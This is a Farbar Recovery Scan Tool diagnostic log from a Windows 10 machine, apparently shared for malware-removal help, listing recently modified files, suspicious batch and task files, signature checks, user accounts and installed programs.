2017-12-16 08:23 - 2017-05-14 19:32 - 000186304 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2017-12-16 08:23 - 2017-05-14 19:32 - 000152512 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2017-12-16 08:23 - 2017-05-14 19:32 - 000057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-12-16 08:23 - 2017-05-07 21:52 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-12-16 06:34 - 2017-05-07 21:52 - 005964688 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-12-16 06:34 - 2017-05-07 21:52 - 002589168 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-12-16 06:34 - 2017-05-07 21:52 - 001767408 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-12-16 06:34 - 2017-05-07 21:52 - 000608056 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-12-16 06:34 - 2017-05-07 21:52 - 000450544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-12-16 06:34 - 2017-05-07 21:52 - 000123704 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-12-16 06:34 - 2017-05-07 21:52 - 000082928 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-12-15 20:51 - 2017-11-13 12:23 - 000003484 _____ C:\WINDOWS\System32\Tasks\gxx speed launcher
2017-12-15 02:17 - 2017-05-07 21:52 - 007917671 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-12-14 09:36 - 2017-11-13 12:23 - 000004588 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2017-12-14 09:36 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-12-14 09:36 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\system32\Macromed
2017-12-14 09:20 - 2017-11-13 12:07 - 000000000 ____D C:\Users\ouroboros\AppData\Local\Packages
2017-12-13 20:35 - 2015-12-26 03:52 - 000000000 ____D C:\Users\ouroboros\AppData\Local\ElevatedDiagnostics
2017-12-13 10:14 - 2017-11-13 12:47 - 000000000 ___RD C:\Users\ouroboros\3D Objects
2017-12-13 10:14 - 2015-11-03 02:44 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-12-13 10:12 - 2017-11-13 12:01 - 005097072 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\TextInput
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\system32\appraiser
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\Provisioning
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\Program Files\Windows Defender
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\PerfLogs
2017-12-13 10:09 - 2017-09-29 16:45 - 000000000 ____D C:\WINDOWS\system32\Dism
2017-12-13 03:26 - 2015-12-22 23:12 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-12-13 03:23 - 2017-10-13 00:14 - 133326408 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT-KB890830.exe
2017-12-13 03:23 - 2015-12-22 23:12 - 133326408 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-12-13 03:20 - 2017-09-29 21:41 - 001856000 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2017-12-13 03:20 - 2017-09-29 21:41 - 000139672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
2017-12-13 03:20 - 2017-09-29 21:41 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
2017-12-13 03:19 - 2017-09-29 21:42 - 001587200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-12-12 04:49 - 2015-12-21 08:04 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
 
==================== Files in the root of some directories =======
 
2018-01-03 10:41 - 2017-09-29 21:42 - 000001110 _____ () C:\Program Files (x86)\Common Files\EnAWI
2017-09-29 21:42 - 2017-09-29 21:42 - 000001110 _____ () C:\Program Files (x86)\Common Files\EnAWI.bat
2018-01-03 10:41 - 2017-09-29 21:42 - 000000054 _____ () C:\Program Files (x86)\Common Files\rYms
2017-09-29 21:42 - 2017-09-29 21:42 - 000000054 _____ () C:\Program Files (x86)\Common Files\rYms.bat
2016-02-14 20:24 - 2017-06-20 09:42 - 000000132 _____ () C:\Users\ouroboros\AppData\Roaming\Adobe PNG Format CS6 Prefs
2017-04-27 13:52 - 2017-04-27 14:35 - 000000055 _____ () C:\Users\ouroboros\AppData\Roaming\My Profile.xml
2018-01-03 19:57 - 2018-01-05 09:59 - 000000164 _____ () C:\Users\ouroboros\AppData\Roaming\sp_data.sys
2017-12-12 04:49 - 2017-12-17 07:07 - 000000068 _____ () C:\Users\ouroboros\AppData\Local\HvpjdXLztn
2017-12-18 08:04 - 2017-12-18 08:50 - 000000068 _____ () C:\Users\ouroboros\AppData\Local\lptx123456
 
Files to move or delete:
====================
C:\Windows\Tasks\{447123AD-7416-1893-A863-7ED1A81B6B4D}.job
C:\Windows\Tasks\{6FEFFD84-0D29-0B78-4530-415A173AA131}.job
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-12-25 00:09
 
==================== End of FRST.txt ============================
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02.01.2018
Ran by ouroboros (05-01-2018 10:22:46)
Running from C:\Users\ouroboros\Desktop
Windows 10 Home Single Language Version 1709 16299.125 (X64) (2017-11-13 04:27:25)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1787623747-1286628437-3931833605-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1787623747-1286628437-3931833605-503 - Limited - Disabled)
Guest (S-1-5-21-1787623747-1286628437-3931833605-501 - Limited - Disabled)
ouroboros (S-1-5-21-1787623747-1286628437-3931833605-1001 - Administrator - Enabled) => C:\Users\ouroboros
Visitor (S-1-5-21-1787623747-1286628437-3931833605-1002 - Limited - Enabled) => C:\Users\Visitor
WDAGUtilityAccount (S-1-5-21-1787623747-1286628437-3931833605-504 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Creative Suite 6 Master Collection (HKLM-x32\...\{E8AD3069-9EB7-4BA8-8BFE-83F4E69355C0}) (Version: 6 - Adobe Systems Incorporated)
Adobe Dreamweaver CC 2014 (HKLM-x32\...\{766255CE-D156-11E3-8DBC-A136EB52ACCF}) (Version: 14.0.0 - Adobe Systems Incorporated)
Adobe Flash Player 28 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 28.0.0.133 - Adobe Systems Incorporated)
Adobe Flash Player 28 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 28.0.0.126 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.1.1 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.23) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.23 - Adobe Systems Incorporated)
Apple Application Support (64-bit) (HKLM\...\{691F30EB-9009-475A-B8A9-E1BF39598FD5}) (Version: 4.1.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
ASUS GIFTBOX Desktop (HKLM-x32\...\{4701E5AB-AF91-4D40-8F18-358CC80E4E5B}) (Version: 1.1.5 - ASUS)
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.4.3 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 4.0.9 - ASUS)
Asus Sonic Suite Plugins (HKLM-x32\...\{538766d1-8795-4e62-b3d3-cf65517bae51}) (Version: 2.0.7 - ASUSTeKcomputer.Inc)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 3.13.0004 - ASUS)
ASUS USB Charger Plus (HKLM-x32\...\{A859E3E5-C62F-4BFA-AF1D-2B95E03166AF}) (Version: 4.1.6 - ASUS)
ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0040 - ASUS)
Autodesk Backburner 2014 (HKLM-x32\...\{3D347E6D-5A03-4342-B5BA-6A771885F379}) (Version: 14.0.0.0 - Autodesk, Inc.)
Autodesk Composite 2014 (HKLM\...\{5AAB972C-FF31-4B01-8445-50C42860EC02}) (Version: 9.0.0.0 - Autodesk) Hidden
Autodesk Composite 2014 (HKLM\...\Autodesk Composite 2014) (Version: 9.0.0.0 - Autodesk)
Autodesk DirectConnect 2014 64-bit (HKLM\...\{8FC7C2B2-0F64-4B35-AA3D-2B051D009243}) (Version: 8.0.56.1 - Autodesk) Hidden
Autodesk DirectConnect 2014 64-bit (HKLM\...\Autodesk DirectConnect 2014 64-bit) (Version: 8.0.56.1 - Autodesk)
Autodesk FBX Converter x64 2013.2 (HKLM-x32\...\Autodesk FBX Converter x64 2013.2) (Version:  - Autodesk)
Autodesk MatchMover 2014 (HKLM\...\{B151ECD3-2DBE-45E9-816E-F8AA6238F6A8}) (Version: 14.00.0000 - Autodesk)
Autodesk Maya 2014 (HKLM\...\{7FA8BC5D-7CE4-42F3-8EAE-32DF5BAB53A7}) (Version: 16.0.0.0 - Autodesk) Hidden
Autodesk Maya 2014 (HKLM\...\Autodesk Maya 2014) (Version: 16.0.0.0 - Autodesk)
Blackboard Collaborate Launcher (HKLM-x32\...\{AEED1D32-C837-405A-8009-6660E3883C9E}) (Version: 1.6.4.0 - Blackboard)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CheckDevicesConfigurator (HKLM\...\{C3B3D79A-7BFB-48AF-9C41-B0FE3D5D071C}) (Version: 2.0.701 - ASUSTeKcomputer.Inc) Hidden
Creatures of Darkness (HKLM-x32\...\{573F9269-A022-4C6F-97BD-CF1316A76369}) (Version: 3.3.1 - Screaming Bee)
Deep Space Voices (HKLM-x32\...\{67CEC218-B250-4B4C-B23F-A597EC8DB153}) (Version: 3.3.1 - Screaming Bee)
Dev-C++ (HKLM-x32\...\Dev-C++) (Version: 5.11 - Bloodshed Software)
Device Setup (HKLM-x32\...\{8D6B05E0-F457-408C-9D13-549334D8FAE1}) (Version: 2.0.2 - ASUSTek Computer Inc.)
Discord (HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\Discord) (Version: 0.0.299 - Discord Inc.)
Dropbox 25 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 1.0.8.0 - Dropbox, Inc.)
Evernote v. 5.8.6 (HKLM-x32\...\{FEDC7C10-EF67-11E4-9B07-00505695D7B0}) (Version: 5.8.6.7519 - Evernote Corp.)
Fantasy Voice Pack (HKLM-x32\...\{5F4C3E1F-87FC-41BD-B219-E4156BBD8AE5}) (Version: 1.3.2 - Screaming Bee)
Female Voice Pack (HKLM-x32\...\{D947A225-8C23-4E52-866E-CF3967476BFC}) (Version: 3.3.2 - Screaming Bee)
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Galactic Voices (HKLM-x32\...\{891D8FC9-726D-46F2-ADC0-E060A6EB1DC3}) (Version: 1.3.1 - Screaming Bee)
GameFirst IV (HKLM-x32\...\{2B5BE4E7-3E40-4BC4-A534-5342E3078F89}) (Version: 1.5.12 - ASUS) Hidden
GameFirst IV (HKLM-x32\...\GameFirst IV 1.5.12) (Version: 1.5.12 - ASUS)
Garena - League of Legends (HKLM-x32\...\LoLPH) (Version:  - Garena Online Pte Ltd.)
Garena (remove only) (HKLM-x32\...\gxx) (Version: 2.0.1712.1422 - Garena)
Google Chrome (HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\Google Chrome) (Version: 63.0.3239.132 - Google Inc.)
IL Download Manager (HKLM-x32\...\IL Download Manager) (Version:  - Image-Line)
Intel® Chipset Device Software (HKLM-x32\...\{c7f54569-0018-439c-809a-48046a4d4ebc}) (Version: 10.1.1.9 - Intel® Corporation) Hidden
Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10603.192 - Intel Corporation)
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1169 - Intel Corporation)
Intel® Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.100.1519.7 - Intel Corporation)
Intel® Wireless Bluetooth® (HKLM-x32\...\{9A287643-10C5-4463-B9D1-B2404CE18CCF}) (Version: 17.1.1529.1620 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{5853172b-5520-4089-9ef4-e26c594382b3}) (Version: 19.30.0 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
Intel® Watchdog Timer Driver (Intel® WDT) (HKLM-x32\...\{3FD0C489-0F02-481a-A3E1-9754CD396761}) (Version:  - Intel Corporation)
Intel® Watchdog Timer Driver (Intel® WDT) (HKLM-x32\...\3FD0C489-0F02-481a-A3E1-9754CD396761) (Version:  - Intel Corporation)
iTunes (HKLM\...\{FBEB98F8-64E4-4FA3-A15E-4A9F42FF962E}) (Version: 12.3.2.35 - Apple Inc.)
Java 8 Update 66 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218066F0}) (Version: 8.0.660.18 - Oracle Corporation)
KKBOX (HKLM-x32\...\KKBOX) (Version: 6.2.0.562 - KKBOX Taiwan Co., Ltd.)
LauncherSetup (HKLM\...\{FAF92126-24C9-4241-A922-FA6F2C896B4A}) (Version: 2.0.701 - ASUSTeKcomputer.Inc) Hidden
Malwarebytes version 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes)
mental ray renderer for Autodesk Maya 2014 (HKLM\...\{4F5AD3FF-38C6-43FB-BB6F-8EF830DEDF16}) (Version: 13.0.0.0 - mental ray)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProplusRetail - en-us) (Version: 16.0.8730.2127 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\OneDriveSetup.exe) (Version: 17.3.7076.1026 - Microsoft Corporation)
Microsoft Project Professional 2016 - en-us (HKLM\...\ProjectProRetail - en-us) (Version: 16.0.8730.2127 - Microsoft Corporation)
Microsoft Visio Professional 2016 - en-us (HKLM\...\VisioProRetail - en-us) (Version: 16.0.8730.2127 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
MorphVOX Pro (HKLM-x32\...\{4bfc0d50-0417-46a0-ab1e-475fb1a90916}) (Version: 4.4.17.22603 - Screaming Bee)
MorphVOX Pro (HKLM-x32\...\{5F075DA5-407B-4F4D-BF2A-922CCA85706A}) (Version: 4.4.17.22603 - Screaming Bee) Hidden
Mozilla Firefox 39.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 39.0 (x86 en-US)) (Version: 39.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 39.0 - Mozilla)
NahimicSettingsConfigurator (HKLM\...\{B1FF19B8-BC5F-49AC-B679-0A5DA36E8A43}) (Version: 2.0.701 - ASUSTeKcomputer.Inc) Hidden
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.63.14 - Black Tree Gaming)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.3.3 - Notepad++ Team)
NVIDIA 3D Vision Driver 388.71 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 388.71 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.11.0.73 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.11.0.73 - NVIDIA Corporation)
NVIDIA Graphics Driver 388.71 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 388.71 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.35.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.35.1 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.8730.2127 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.8730.2127 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0409-1000-0000000FF1CE}) (Version: 16.0.8730.2127 - Microsoft Corporation) Hidden
PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden
ProductDaemonSetup (HKLM\...\{0F5183BD-29DA-48CC-93DB-3924DA7EA212}) (Version: 2.0.701 - ASUSTeKcomputer.Inc) Hidden
qBittorrent 4.0.3 (HKLM-x32\...\qBittorrent) (Version: 4.0.3 - The qBittorrent project)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.2.703.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7831 - Realtek Semiconductor Corp.)
ROG Gaming Center (HKLM-x32\...\{CC182DBF-FC67-4F79-9930-6A2682E60BDD}) (Version: 1.0.1 - ASUS)
ROG MacroKey (HKLM-x32\...\{1101D2B9-7E8C-4361-88D5-AB0A2EB705EC}) (Version: 1.0.3 - ASUS)
Sci-Fi Voice Pack (HKLM-x32\...\{BC038C91-D3C6-4E43-8439-B65976FE7937}) (Version: 1.3.1 - Screaming Bee)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
SonicRadarSetup (HKLM\...\{490C61FF-D5A6-4335-A51E-0FC7DC65F591}) (Version: 1.0.0.0 - ASUSTeKcomputer.Inc) Hidden
SonicStudioSetup (HKLM\...\{34BCBD15-E877-4277-A4E1-A8C1E2DE0FE2}) (Version: 2.0.701 - ASUSTeKcomputer.Inc) Hidden
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Sun Broadband Hostless Modem (HKLM-x32\...\{AEFF9E60-3E93-41EE-9895-311F7D1C5FFD}) (Version: 1.0.0.2 - ZTE Corporation)
System Requirements Lab (HKLM-x32\...\{F89CDED6-B1F1-489F-BA44-698BF6A737C2}) (Version: 6.1.6.0 - Husdawg, LLC)
TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - )
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
Thunderbolt™ Software (HKLM-x32\...\{E265C71F-14DA-462C-A06A-CBA776B695F1}) (Version: 15.2.32.250 - Intel Corporation)
Unity Web Player (HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\UnityWebPlayer) (Version: 5.3.5f1 - Unity Technologies ApS)
Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version:  - WildTangent) Hidden
VLC media player 2.1.4 (HKLM\...\VLC media player) (Version: 2.1.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.12-2 - Wacom Technology Corp.)
WebStorage (HKLM-x32\...\WebStorage) (Version: 2.2.2.524 - ASUS Cloud Corporation)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-asus) (Version: 4.0.11.16 - WildTangent)
Windows Driver Package - ASUS (AsusSGDrv) Mouse  (08/06/2015 8.0.0.19) (HKLM\...\149F37A1996406108DA0EB71D7EBC48895119059) (Version: 08/06/2015 8.0.0.19 - ASUS)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 3.0.1 - ASUS)
WinRAR 5.31 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.1 - win.rar GmbH)
WPS Office (9.1.0.4758) (HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\WPS Office) (Version: 9.1.0.4758 - Kingsoft Corp.)
XSplit Gamecaster (HKLM-x32\...\{0E12BEC0-F2EE-43FA-AEA0-24B5E9F80167}) (Version: 2.5.1507.3011 - SplitmediaLabs)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll => No File
